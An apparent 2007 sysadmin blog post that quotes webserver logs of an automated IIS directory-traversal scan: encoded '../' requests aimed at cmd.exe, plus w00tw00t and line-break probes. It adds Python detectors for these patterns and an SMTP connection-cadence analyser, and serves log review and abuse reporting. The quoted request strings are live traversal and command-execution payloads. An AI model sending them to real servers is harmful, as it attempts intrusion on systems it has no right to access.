Who says Windows is secure….

Though surely just a script making a lot of attempts to hack into a Windows system, this is what I found in last week’s webserver log:
222.189.7.29 - - [13/Feb/2007:07:25:54 +0100] "GET /cgi-bin/query/scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:25:55 +0100] "GET /cgi-bin/query/scripts/root.exe?/c+dir HTTP/1.0" 404 782
222.189.7.29 - - [13/Feb/2007:07:25:59 +0100] "GET /cgi-bin/query/msadc/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:00 +0100] "GET /cgi-bin/query/msadc/..À/../..À/../..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:01 +0100] "GET /cgi-bin/query/msadc/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:05 +0100] "GET /cgi-bin/query/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:06 +0100] "GET /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:07 +0100] "GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:09 +0100] "GET /cgi-bin/query/scripts/..À/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:10 +0100] "GET /cgi-bin/query/scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:11 +0100] "GET /cgi-bin/query/scripts/..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:12 +0100] "GET /cgi-bin/query/scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:13 +0100] "GET /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:17 +0100] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:18 +0100] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:19 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:20 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:21 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:22 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:23 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:25 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:26 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:27 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:28 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:29 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:30 +0100] "GET /cgi-bin/query/scripts/cmd.exe?/c+dir HTTP/1.0" 404 781
222.189.7.29 - - [13/Feb/2007:07:26:31 +0100] "GET /scripts/cmd32.exe" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:32 +0100] "GET /cgi-bin/query/scripts/cmd32.exe?/c+dir HTTP/1.0" 404 783
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:34 +0100] "GET /cgi-bin/query/msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 800
222.189.7.29 - - [13/Feb/2007:07:26:35 +0100] "GET /cgi-bin/query/script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 801
222.189.7.29 - - [13/Feb/2007:07:26:36 +0100] "GET /cgi-bin/query/_mem_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:37 +0100] "GET /cgi-bin/query/_mem_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:38 +0100] "GET /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:39 +0100] "GET /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:44 +0100] "GET /cgi-bin/query/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:45 +0100] "GET /cgi-bin/query/_vti_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:49 +0100] "GET /cgi-bin/query/_vti_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:50 +0100] "GET /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /cgi-bin/query/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:52 +0100] "GET /cgi-bin/query/_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:53 +0100] "GET /cgi-bin/query/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:54 +0100] "GET /cgi-bin/query/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:55 +0100] "GET /cgi-bin/query/bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
222.189.7.29 - - [13/Feb/2007:07:26:56 +0100] "GET /cgi-bin/query/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 806
222.189.7.29 - - [13/Feb/2007:07:26:57 +0100] "GET /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:59 +0100] "GET /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:00 +0100] "GET /cgi-bin/../../../../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:03 +0100] "GET /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:04 +0100] "GET /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:05 +0100] "GET /cgi-Bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:06 +0100] "GET /cgi-bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675

Clearly someone who’s running a script, and I severely doubt his knowledge… Just trying to see if he can get in. Or espionage? The address is said to be located in China:

inetnum: 222.184.0.0 - 222.191.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CJ186-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET-JS
mnt-routes: MAINT-CHINANET-JS

Apart from this, just a few that appear quite regularly:

69.84.207.37 - - [12/Feb/2007:07:02:35 +0100] "GET /No%0Ate-email.htm HTTP/1.1" 403 864
69.84.207.37 - - [12/Feb/2007:07:06:27 +0100] "GET /cgi-bin/count.exe HTTP/1.1" 502 900
69.84.207.37 - - [12/Feb/2007:07:06:28 +0100] "GET /cgi-bin/c%0Aount.exe HTTP/1.1" 404 887
207.234.131.90 - - [12/Feb/2007:09:56:37 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 893

These are just a few of them; not a lot in a week.
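As an added example (not code from this post), the following Python checker reads an Apache-style access log and flags the three things the entries above have in common: a ".." followed by a separator in any of the encodings the scan used (raw, %5c/%2f, the over-long UTF-8 forms such as %c0%af and %c1%9c, or the unreadable bytes this log rendered as "À", "?" and "_"), a request for cmd.exe/cmd32.exe/root.exe, and the w00tw00t banner or an encoded line break in the path. It then groups hits per source address and, most usefully, records whether any such request ever got a 2xx answer, since every line above was a 403 or 404 and a 200 would be the one case that needs a response. The sample input is a handful of lines copied from the logs above plus two constructed lines (a benign request and a made-up 200 response to show what a hit would look like); the regexes and function names are mine.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# ".." followed by a separator in any encoding the scan used. %c0%af, %c0%2f,
# %c1%1c, %c1%9c and %c1%9f are over-long UTF-8 forms of '/' and '\' (the IIS
# Unicode traversal); "..?" and ".._" are how the log rendered bytes it could not
# print; \xc0 / \xc1 is the raw byte as it appears when the log is read as Latin-1.
# Ordinary clients almost never send "..", so a broad match is acceptable here.
TRAVERSAL_RE = re.compile(
    r'\.\.(/|\\|%5c|%2f|%c0%af|%c0%2f|%c1%1c|%c1%9c|%c1%9f|\?|_|[\xc0\xc1])',
    re.IGNORECASE,
)
# Executables the scan tries to reach once a traversal lands.
TOOL_RE = re.compile(r'(cmd(32)?\.exe|root\.exe)', re.IGNORECASE)
# Other probe fingerprints from the post: the w00tw00t scanner banner and an
# encoded CR/LF stuffed into a path to slip past naive string matching.
PROBE_RE = re.compile(r'(w00tw00t|%0a|%0d)', re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into host, timestamp, method, URL and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group('request').split(' ')
    return {
        'host': m.group('host'),
        'time': datetime.strptime(m.group('time'), '%d/%b/%Y:%H:%M:%S %z'),
        'method': parts[0] if parts else '',
        'url': parts[1] if len(parts) > 1 else '',
        'status': int(m.group('status')),
    }


def classify(url):
    """Return the list of indicator names matched by one request URL.

    The URL is checked both raw and after one round of percent-decoding, so a
    double-encoded form such as ..%255c.. (which decodes to ..%5c..) is caught too.
    """
    hits = []
    decoded = unquote(url)
    if TRAVERSAL_RE.search(url) or TRAVERSAL_RE.search(decoded):
        hits.append('traversal')
    if TOOL_RE.search(decoded):
        hits.append('shell-exec')
    if PROBE_RE.search(url):
        hits.append('probe')
    return hits


def scan_report(lines):
    """Group suspicious requests per source host with counts, indicators,
    first/last seen, status-code histogram and whether anything ever succeeded."""
    per_host = defaultdict(lambda: {
        'count': 0, 'indicators': set(), 'first': None, 'last': None,
        'statuses': defaultdict(int), 'succeeded': False,
    })
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec['url'])
        if not hits:
            continue
        e = per_host[rec['host']]
        e['count'] += 1
        e['indicators'].update(hits)
        e['first'] = rec['time'] if e['first'] is None else min(e['first'], rec['time'])
        e['last'] = rec['time'] if e['last'] is None else max(e['last'], rec['time'])
        e['statuses'][rec['status']] += 1
        if 200 <= rec['status'] < 300:   # a probe that was actually served
            e['succeeded'] = True
    return dict(per_host)


SAMPLE_LOG = [
    # Copied from the scan shown in the post ("\xc0" is the byte rendered as "À" there).
    '222.189.7.29 - - [13/Feb/2007:07:25:54 +0100] "GET /cgi-bin/query/scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815',
    '222.189.7.29 - - [13/Feb/2007:07:25:55 +0100] "GET /cgi-bin/query/scripts/root.exe?/c+dir HTTP/1.0" 404 782',
    '222.189.7.29 - - [13/Feb/2007:07:25:59 +0100] "GET /cgi-bin/query/msadc/..\xc0/..\xc0/..\xc0/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809',
    '222.189.7.29 - - [13/Feb/2007:07:26:06 +0100] "GET /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671',
    '222.189.7.29 - - [13/Feb/2007:07:26:22 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776',
    '222.189.7.29 - - [13/Feb/2007:07:26:31 +0100] "GET /scripts/cmd32.exe" 404 675',
    '69.84.207.37 - - [12/Feb/2007:07:06:28 +0100] "GET /cgi-bin/c%0Aount.exe HTTP/1.1" 404 887',
    '207.234.131.90 - - [12/Feb/2007:09:56:37 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 893',
    # Constructed: a benign request that must not be flagged.
    '192.0.2.10 - - [13/Feb/2007:08:00:00 +0100] "GET /index.html HTTP/1.1" 200 1234',
    # Constructed: what the one alarming case would look like (probe answered with 200).
    '198.51.100.7 - - [13/Feb/2007:08:05:00 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1500',
]

if __name__ == '__main__':
    for host, e in scan_report(SAMPLE_LOG).items():
        flag = 'SERVED!' if e['succeeded'] else 'all refused'
        print(f"{host}: {e['count']} hits, {sorted(e['indicators'])}, "
              f"{e['first']:%H:%M:%S}-{e['last']:%H:%M:%S}, {dict(e['statuses'])}, {flag}")
```

Run it against a real access log with `scan_report(open(path, encoding='latin-1'))`; reading as Latin-1 is what keeps the raw 0xC0/0xC1 bytes matchable instead of raising a decode error.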
Mail
Someone is trying to blow the SMTP server – for over 24 hours up to now:
%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.71 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4977

%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.92 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
...
%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:57.98 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4144

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:58.15 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
to a host name

I haven’t counted the entries, but the attempts occur every 2 minutes or so. Alas, the router has no ability to block him there…
This address is a UK one:
inetnum: 84.246.96.0 - 84.246.103.255
netname: UK-WH-UK-20040830
descr: World Hub Limited
descr: PROVIDER Local Registry
country: GB # US
org: ORG-WHL1-RIPE
admin-c: DA1277-RIPE
tech-c: DA1277-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: worldhub-ip
mnt-routes: worldhub-ip
source: RIPE # Filtered
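An added example, not from the post: a short Python script that reads OPCOM output in the format shown above, pairs each OPCOM header with the "SMTP Accept Request" line that follows it, and measures per remote host how many connections arrived, over what span, and the median gap between them. That turns "every 2 minutes or so" into a number that can be quoted in an abuse report. The OPCOM excerpt embedded below is constructed to match the format of the messages above; its timestamps are made up and it is not the real log.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# OPCOM header line, e.g. "%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.71 %%%%%%%%%%%"
HEADER_RE = re.compile(
    r'^%+ OPCOM (?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d{2}) %+$'
)
# The message line reporting an inbound SMTP connection.
ACCEPT_RE = re.compile(r'SMTP Accept Request from Host: (?P<host>\S+) Port: (?P<port>\d+)')


def parse_accepts(text):
    """Yield (timestamp, host) for every SMTP accept request in an OPCOM log.

    The timestamp lives on the OPCOM header, the host on a later line of the same
    message, so the most recent header is carried until an accept line uses it.
    """
    pending = None
    for line in text.splitlines():
        h = HEADER_RE.match(line.strip())
        if h:
            pending = datetime.strptime(h.group('ts'), '%d-%b-%Y %H:%M:%S.%f')
            continue
        a = ACCEPT_RE.search(line)
        if a and pending is not None:
            yield pending, a.group('host')
            pending = None


def cadence_report(text, min_events=3):
    """Per host: number of connections, total span and median gap in seconds,
    plus a repeat_offender flag once the host reaches min_events connections."""
    times = defaultdict(list)
    for ts, host in parse_accepts(text):
        times[host].append(ts)
    report = {}
    for host, ts_list in times.items():
        ts_list.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(ts_list, ts_list[1:])]
        report[host] = {
            'events': len(ts_list),
            'span_seconds': (ts_list[-1] - ts_list[0]).total_seconds(),
            'median_gap_seconds': median(gaps) if gaps else None,
            'repeat_offender': len(ts_list) >= min_events,
        }
    return report


# Constructed OPCOM excerpt (same layout as the messages in the post, invented times).
SAMPLE_OPCOM = """\
%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.71 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4977

%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.92 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
to a host name

%%%%%%%%%%% OPCOM 18-FEB-2007 14:48:14.02 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4981

%%%%%%%%%%% OPCOM 18-FEB-2007 14:49:02.40 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 192.0.2.25 Port: 40001

%%%%%%%%%%% OPCOM 18-FEB-2007 14:50:13.50 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4990

%%%%%%%%%%% OPCOM 18-FEB-2007 14:52:15.10 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4995
"""

if __name__ == '__main__':
    for host, r in cadence_report(SAMPLE_OPCOM).items():
        gap = f"{r['median_gap_seconds']:.1f}s" if r['median_gap_seconds'] else 'n/a'
        print(f"{host}: {r['events']} connections over {r['span_seconds']:.0f}s, "
              f"median gap {gap}, repeat offender: {r['repeat_offender']}")
```

The warning messages (`%TCPIP-W-SMTP_UNBKTRNSIP`) are deliberately ignored: they carry no timestamp of their own beyond the header, and the accept line is the better count of actual connections.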

Both ISPs will be informed.
